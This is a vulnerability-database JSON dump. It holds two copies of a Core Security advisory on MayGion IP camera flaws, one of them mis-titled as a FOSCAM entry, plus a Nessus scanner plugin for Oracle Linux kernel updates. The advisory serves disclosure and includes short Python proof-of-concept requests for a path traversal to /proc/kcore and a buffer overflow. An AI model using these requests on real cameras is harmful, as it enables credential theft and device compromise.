{"seebug": [{"lastseen": "2017-11-19T15:04:06", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n \r\nMayGion IP Cameras multiple vulnerabilities\r\n \r\n1. *Advisory Information*\r\n \r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n \r\n3. *Vulnerability Description*\r\n \r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n \r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n \r\n4. *Vulnerable Packages*\r\n \r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . H.264 ipcam firmware 2013.04.22.\r\n \r\n6. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\n7.1. *User Credentials Leaked via Path Traversal*\r\n \r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n7.2. *Buffer overflow*\r\n \r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n8. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n \r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n \r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n \r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n \r\n9. *References*\r\n \r\n[1] http://www.maygion.com\r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "published": "2014-07-01T00:00:00", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1604", "CVE-2013-1605"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79467", "id": "SSV:79467", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T14:17:39", "description": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n \r\nMayGion IP Cameras multiple vulnerabilities\r\n \r\n1. *Advisory Information*\r\n \r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n \r\n3. *Vulnerability Description*\r\n \r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n \r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n \r\n4. *Vulnerable Packages*\r\n \r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n \r\n5. *Non-Vulnerable Packages*\r\n \r\n . H.264 ipcam firmware 2013.04.22.\r\n \r\n6. *Credits*\r\n \r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\n7.1. *User Credentials Leaked via Path Traversal*\r\n \r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n7.2. *Buffer overflow*\r\n \r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n8. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n \r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n \r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n \r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n \r\n9. *References*\r\n \r\n[1] http://www.maygion.com\r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "published": "2014-07-01T00:00:00", "title": "FOSCAM IP-Cameras Improper Access Restrictions", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1604", "CVE-2013-1605"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-80695", "id": "SSV:80695", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "nessus": [{"lastseen": "2021-01-17T12:44:22", "description": "From Red Hat Security Advisory 2009:0331 :\n\nUpdated kernel packages that resolve several security issues and fix\nvarious bugs are now available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update addresses the following security issues :\n\n* a buffer overflow was found in the Linux kernel Partial Reliable\nStream Control Transmission Protocol (PR-SCTP) implementation. This\ncould, potentially, lead to a denial of service if a Forward-TSN chunk\nis received with a large stream ID. (CVE-2009-0065, Important)\n\n* a memory leak was found in keyctl handling. A local, unprivileged\nuser could use this flaw to deplete kernel memory, eventually leading\nto a denial of service. (CVE-2009-0031, Important)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size file in '/sys/devices/platform/dell_rbu/'. (CVE-2009-0322,\nImportant)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a denial of service. Note: by default, '/dev/sg*'\ndevices are accessible only to the root user. (CVE-2008-5700, Low)\n\nThis update also fixes the following bugs :\n\n* when the hypervisor changed a page table entry (pte) mapping from\nread-only to writable via a make_writable hypercall, accessing the\nchanged page immediately following the change caused a spurious page\nfault. When trying to install a para-virtualized Red Hat Enterprise\nLinux 4 guest on a Red Hat Enterprise Linux 5.3 dom0 host, this fault\ncrashed the installer with a kernel backtrace. With this update, the\n'spurious' page fault is handled properly. (BZ#483748)\n\n* net_rx_action could detect its cpu poll_list as non-empty, but have\nthat same list reduced to empty by the poll_napi path. This resulted\nin garbage data being returned when net_rx_action calls list_entry,\nwhich subsequently resulted in several possible crash conditions. The\nrace condition in the network code which caused this has been fixed.\n(BZ#475970, BZ#479681 & BZ#480741)\n\n* a misplaced memory barrier at unlock_buffer() could lead to a\nconcurrent h_refcounter update which produced a reference counter leak\nand, later, a double free in ext3_xattr_release_block(). Consequent to\nthe double free, ext3 reported an error\n\next3_free_blocks_sb: bit already cleared for block [block number]\n\nand mounted itself as read-only. With this update, the memory barrier\nis now placed before the buffer head lock bit, forcing the write order\nand preventing the double free. (BZ#476533)\n\n* when the iptables module was unloaded, it was assumed the correct\nentry for removal had been found if 'wrapper->ops->pf' matched the\nvalue passed in by 'reg->pf'. If several ops ranges were registered\nagainst the same protocol family, however, (which was likely if you\nhad both ip_conntrack and ip_contrack_* loaded) this assumption could\nlead to NULL list pointers and cause a kernel panic. With this update,\n'wrapper->ops' is matched to pointer values 'reg', which ensures the\ncorrect entry is removed and results in no NULL list pointers.\n(BZ#477147)\n\n* when the pidmap page (used for tracking process ids, pids)\nincremented to an even page (ie the second, fourth, sixth, etc. pidmap\npage), the alloc_pidmap() routine skipped the page. This resulted in\n'holes' in the allocated pids. For example, after pid 32767, you would\nexpect 32768 to be allocated. If the page skipping behavior presented,\nhowever, the pid allocated after 32767 was 65536. With this update,\nalloc_pidmap() no longer skips alternate pidmap pages and allocated\npid holes no longer occur. This fix also corrects an error which\nallowed pid_max to be set higher than the pid_max limit has been\ncorrected. (BZ#479182)\n\nAll Red Hat Enterprise Linux 4 users should upgrade to these updated\npackages, which contain backported patches to resolve these issues.\nThe system must be rebooted for this update to take effect.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : kernel (ELSA-2009-0331)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5700", "CVE-2009-0322", "CVE-2009-0065", "CVE-2009-0031"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-hugemem", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-xenU-devel", "p-cpe:/a:oracle:linux:kernel-xenU", "p-cpe:/a:oracle:linux:kernel-smp-devel", "p-cpe:/a:oracle:linux:kernel-largesmp", "p-cpe:/a:oracle:linux:kernel-smp", "p-cpe:/a:oracle:linux:kernel-hugemem-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-largesmp-devel"], "id": "ORACLELINUX_ELSA-2009-0331.NASL", "href": "https://www.tenable.com/plugins/nessus/67814", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:0331 and \n# Oracle Linux Security Advisory ELSA-2009-0331 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67814);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-5700\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0322\");\n script_bugtraq_id(33113);\n script_xref(name:\"RHSA\", value:\"2009:0331\");\n\n script_name(english:\"Oracle Linux 4 : kernel (ELSA-2009-0331)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:0331 :\n\nUpdated kernel packages that resolve several security issues and fix\nvarious bugs are now available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update addresses the following security issues :\n\n* a buffer overflow was found in the Linux kernel Partial Reliable\nStream Control Transmission Protocol (PR-SCTP) implementation. This\ncould, potentially, lead to a denial of service if a Forward-TSN chunk\nis received with a large stream ID. (CVE-2009-0065, Important)\n\n* a memory leak was found in keyctl handling. A local, unprivileged\nuser could use this flaw to deplete kernel memory, eventually leading\nto a denial of service. (CVE-2009-0031, Important)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size file in '/sys/devices/platform/dell_rbu/'. (CVE-2009-0322,\nImportant)\n\n* a deficiency was found in the libATA implementation. This could,\npotentially, lead to a denial of service. Note: by default, '/dev/sg*'\ndevices are accessible only to the root user. (CVE-2008-5700, Low)\n\nThis update also fixes the following bugs :\n\n* when the hypervisor changed a page table entry (pte) mapping from\nread-only to writable via a make_writable hypercall, accessing the\nchanged page immediately following the change caused a spurious page\nfault. When trying to install a para-virtualized Red Hat Enterprise\nLinux 4 guest on a Red Hat Enterprise Linux 5.3 dom0 host, this fault\ncrashed the installer with a kernel backtrace. With this update, the\n'spurious' page fault is handled properly. (BZ#483748)\n\n* net_rx_action could detect its cpu poll_list as non-empty, but have\nthat same list reduced to empty by the poll_napi path. This resulted\nin garbage data being returned when net_rx_action calls list_entry,\nwhich subsequently resulted in several possible crash conditions. The\nrace condition in the network code which caused this has been fixed.\n(BZ#475970, BZ#479681 & BZ#480741)\n\n* a misplaced memory barrier at unlock_buffer() could lead to a\nconcurrent h_refcounter update which produced a reference counter leak\nand, later, a double free in ext3_xattr_release_block(). Consequent to\nthe double free, ext3 reported an error\n\next3_free_blocks_sb: bit already cleared for block [block number]\n\nand mounted itself as read-only. With this update, the memory barrier\nis now placed before the buffer head lock bit, forcing the write order\nand preventing the double free. (BZ#476533)\n\n* when the iptables module was unloaded, it was assumed the correct\nentry for removal had been found if 'wrapper->ops->pf' matched the\nvalue passed in by 'reg->pf'. If several ops ranges were registered\nagainst the same protocol family, however, (which was likely if you\nhad both ip_conntrack and ip_contrack_* loaded) this assumption could\nlead to NULL list pointers and cause a kernel panic. With this update,\n'wrapper->ops' is matched to pointer values 'reg', which ensures the\ncorrect entry is removed and results in no NULL list pointers.\n(BZ#477147)\n\n* when the pidmap page (used for tracking process ids, pids)\nincremented to an even page (ie the second, fourth, sixth, etc. pidmap\npage), the alloc_pidmap() routine skipped the page. This resulted in\n'holes' in the allocated pids. For example, after pid 32767, you would\nexpect 32768 to be allocated. If the page skipping behavior presented,\nhowever, the pid allocated after 32767 was 65536. With this update,\nalloc_pidmap() no longer skips alternate pidmap pages and allocated\npid holes no longer occur. This fix also corrects an error which\nallowed pid_max to be set higher than the pid_max limit has been\ncorrected. (BZ#479182)\n\nAll Red Hat Enterprise Linux 4 users should upgrade to these updated\npackages, which contain backported patches to resolve these issues.\nThe system must be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-March/000912.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/03/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-5700\", \"CVE-2009-0031\", \"CVE-2009-0065\", \"CVE-2009-0322\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2009-0331\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-doc-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"ia64\", reference:\"kernel-largesmp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"ia64\", reference:\"kernel-largesmp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-smp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-smp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-xenU-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-xenU-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-78.0.17.0.1.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:22", "description": "From Red Hat Security Advisory 2009:0326 :\n\nUpdated kernel packages that fix several security issues and several\nbugs are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity fixes :\n\n* memory leaks were found on some error paths in the icmp_send()\nfunction in the Linux kernel. This could, potentially, cause the\nnetwork connectivity to cease. (CVE-2009-0778, Important)\n\n* Chris Evans reported a deficiency in the clone() system call when\ncalled with the CLONE_PARENT flag. This flaw permits the caller (the\nparent process) to indicate an arbitrary signal it wants to receive\nwhen its child process exits. This could lead to a denial of service\nof the parent process. (CVE-2009-0028, Moderate)\n\n* an off-by-one underflow flaw was found in the eCryptfs subsystem.\nThis could potentially cause a local denial of service when the\nreadlink() function returned an error. (CVE-2009-0269, Moderate)\n\n* a deficiency was found in the Remote BIOS Update (RBU) driver for\nDell systems. This could allow a local, unprivileged user to cause a\ndenial of service by reading zero bytes from the image_type or\npacket_size files in '/sys/devices/platform/dell_rbu/'.\n(CVE-2009-0322, Moderate)\n\n* an inverted logic flaw was found in the SysKonnect FDDI PCI adapter\ndriver, allowing driver statistics to be reset only when the\nCAP_NET_ADMIN capability was absent (local, unprivileged users could\nreset driver statistics). (CVE-2009-0675, Moderate)\n\n* the sock_getsockopt() function in the Linux kernel did not properly\ninitialize a data structure that can be directly returned to\nuser-space when the getsockopt() function is called with SO_BSDCOMPAT\noptname set. This flaw could possibly lead to memory disclosure.\n(CVE-2009-0676, Moderate)\n\n* the ext2 and ext3 file system code failed to properly handle\ncorrupted data structures, 